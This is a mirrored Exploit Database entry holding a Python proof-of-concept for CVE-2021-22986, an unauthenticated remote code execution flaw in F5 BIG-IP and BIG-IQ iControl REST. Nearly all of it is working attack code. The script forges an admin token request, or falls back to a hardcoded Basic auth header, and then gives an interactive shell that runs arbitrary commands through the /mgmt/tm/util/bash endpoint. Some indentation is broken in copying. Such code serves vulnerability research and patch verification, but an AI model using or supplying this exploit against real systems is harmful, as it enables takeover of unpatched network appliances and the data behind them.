F5 BIG-IP 16.0.x – iControl REST Remote Code Execution (Unauthenticated)

• Exploit Database
• 19 阅读

• 作者： Al1ex
  日期： 2021-04-02
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/49738/

• # Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)
  # Exploit Author: Al1ex
  # Vendor Homepage: https://www.f5.com/products/big-ip-services
  # Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2
  # CVE : CVE-2021-22986
  
  import requests
  from requests.packages.urllib3.exceptions import InsecureRequestWarning
  requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  import sys
  
  
  def title():
  print('''
  ______ _______________ ___ ______________ ___ _____ 
   /|\ \/ / | ____| |__ \ / _ \|__ \/_ ||__ \|__ \ / _ \ / _ \/ / 
  |,----' \ \/ /||________ ) | | | | |) || |______ ) |) | | (_) | | (_) |/ /_ 
  || \/ | __||______/ /| | | | / / | | |______/ // / \__, |> _ <| '_ \
  |`----. \/||____ / /_| |_| |/ /_ | | / /_ / /_ / /| (_) | | (_) | 
   \______|\__/ |_______| |____|\___/|____||_||____| |____| /_/\___/ \___/ 
  
  Author:Al1ex@Heptagram
  Github:https://github.com/Al1ex
  ''') 
  
  def exploit(url):
  	target_url = url + '/mgmt/shared/authn/login'
  	data = {
  		"bigipAuthCookie":"",
  		"username":"admin",
  		"loginReference":{"link":"/shared/gossip"},
  		"userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"}
  	}
  	headers = {
  		"User-Agent": "hello-world",
  		"Content-Type":"application/x-www-form-urlencoded"
  	}
  	response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)
  	if "/mgmt/shared/authz/tokens/" not in response.text:
  		print('(-) Get token fail !!!')
  		print('(*) Tested Method 2:') 
  		header_2 = {
  		'User-Agent': 'hello-world',
  		'Content-Type': 'application/json',
  		'X-F5-Auth-Token': '',
  		'Authorization': 'Basic YWRtaW46QVNhc1M='
  		}
  		data_2 = {
  			"command": "run", 
  			"utilCmdArgs": "-c whoami"
  		}
  		check_url = url + '/mgmt/tm/util/bash'
  		try:
  			response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)
  			if response2.status_code == 200 and 'commandResult' in response2.text:
  				while True:
  					cmd = input("(:CMD)> ")
  					data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)}
  					r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)
  					if r.status_code == 200 and 'commandResult' in r.text:
  						print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
  			else:
  				print('(-) Not vuln...')
  				exit(0)
  		except Exception:
  			print('ERROR Connect')
  	print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]))
  	while True:
  		cmd = input("(:CMD)> ")
  		headers = {
  			"Content-Type": "application/json",
  			"X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])
  		}
  		data_json = {
  			"command": "run", 
  			"utilCmdArgs": "-c \'%s\'"%(cmd)
  		}
  		exp_url= url + '/mgmt/tm/util/bash'
  		exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)
  		if exp_req.status_code == 200 and 'commandResult' in exp_req.text:
  			print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
  		else:
  			print('(-) Not vuln...')
  			exit(0)
  
  if __name__ == '__main__':
  title()
  if(len(sys.argv) < 2):
  	print('[+] USAGE: python3 %s https://<target_url>\n'%(sys.argv[0]))
  	exit(0)
  else:
  	exploit(sys.argv[1])